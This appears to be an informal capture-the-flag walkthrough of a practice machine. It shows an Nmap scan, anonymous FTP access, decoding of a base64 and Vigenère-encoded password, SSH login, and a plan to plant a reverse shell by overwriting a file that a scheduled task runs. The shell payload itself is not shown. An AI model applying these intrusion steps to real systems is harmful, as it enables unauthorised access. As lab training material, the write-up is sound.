# Nmap 7.94 scan initiated Tue Jan 16 14:51:09 2024 as: nmap -sC -sV -oN nmap -vv 10.10.252.99
Increasing send delay for 10.10.252.99 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Nmap scan report for 10.10.252.99
Host is up, received syn-ack (0.37s latency).
Scanned at 2024-01-16 14:51:10 PST for 112s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.135.209
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII=
| 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Nicholas Cage Stories
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 16 14:53:02 2024 -- 1 IP address (1 host up) scanned in 112.67 seconds
ftp 10.10.252.99 21
The file looks like a base64 encoded
Then i actually decode it in the terminal
echo "" | base64 -d
Then we will put this cipher into cipher analyzer online so that we can identify what kind of cipher is this
Looks like this is vigenere cipher, we will find a solver for this
Once we find the decoded cipher text
Now we have a password which is "Mydadisghostrideraintthatcoolnocausehesonfirejokes"
Then we will shh to user weston
ssh weston@10.10.252.132
Then run it in the victim machine
As we can see here that this is the content of the python file
ORRRRR we can use this command to find the files that user cage is accessing
find / -user cage 2> /dev/null
Then move to the directory
Then we will edit the .quotes file
And delete all of the contents and put this in,
This will create a reverse shell and we will get a reverse shell to the user cage
But of course we need to wait for the task to execute the file.
